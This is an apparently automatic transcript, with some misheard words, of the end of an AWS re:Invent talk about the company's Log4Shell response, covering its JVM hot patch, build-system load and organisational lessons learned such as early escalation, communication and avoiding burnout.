Um the hot patch from bolker incredibly cool, i think not just for us, uh but for a lot of the folks external to aws that also ended up using the hot patch, really cool and a big game changer. I think if patching is hard, which it is in a lot of places being able to patch that running jvm um was a big win.

Um four builder tools held up pretty well. This is an unbelievably massive massive amount of deployments, right? Which means an unbelievably massive amount of load in the build systems and some proactive thinking from the builder tools, teams around things like scaling up in waves. Um really made some of this possible.

Finally, this required hard work from thousands of teams during a during a really particularly tough time of year. Folks wanna go on holidays, their kids have holiday concerts, they have vacations planned, locke for shell is not necessarily compatible with vacation plans. Um but nothing gets you in the holiday spirit like a zero day.

More generally, what did we learn about what works and what didn't work. So the first engage our leaders early, right? So we know that ghostbusters is a senior in your group and we're, we're kind of leading with that from the security side, but on the service team side, so on the folks that own those pieces like e two, engaging them early was the right call two. We know that we have to over communicate and we have to communicate much more and much more often.

We have to work backwards from what we can do for teams. So what work we do centrally so that teams don't have to do anything if we had asked teams to do every single piece of work here on their own. It would have been an incredibly, incredibly large spend of resources for something that was already very expensive. So the more that we can do for them to make it easier, the better things end up going four, you have to have a plan for the whole long haul.

So in this case, that means things like when do people sleep? When do people eat? When do people get a chance to sign off of on off line and bake cookies or go to the gym? I don't know. Right. But you have to have a plan for how to not burn people out in the first couple of minutes of the first day and then lastly, you, you need who you need. It's ok in this case, right? To go straight to senior. So to page people's principal engineers, that's what they're for or to page senior leadership, right? Like the general manager of a service. When things are really important, you just go straight to, you need, we're all here to be paged, we're all paid to work on these services. So you just go straight to who you need.

And six, you have to be flexible and you have to iterate quickly and you have to be ready to kind of move to move on the fly and to be flexible and to do things like start rolling out a hot patch.

By the end of this, this exercise, we wrote around six separate retrospectives for how log for she went, right? So everything from that initial incident response to how well the build tooling performed to what we could have improved in our analysis.

And finally, before i let you folks go, this would not be allowed for c talk without acknowledging the incredible dedication and hard work from thousands and thousands and thousands of aws teams. Um this was a tough one. I know that it was a tough one for customers to um and none of this would have been possible without the hard work from, from a lot of folks that is all.

Thank you for joining me on this, on this last day of re invent. Uh we won't do questions on the, on the recording, but um i'll hang out for maybe 55 minutes at the back of the, of the room if just want to ask any questions. Uh and i am contractually obligated to tell you to please do the session survey on how much you love a friday 10 a.m. session. That is all. Thank you very much.

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值